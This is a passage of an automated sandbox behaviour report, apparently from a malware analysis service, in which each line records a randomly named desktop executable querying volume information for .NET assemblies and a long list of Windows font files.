Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
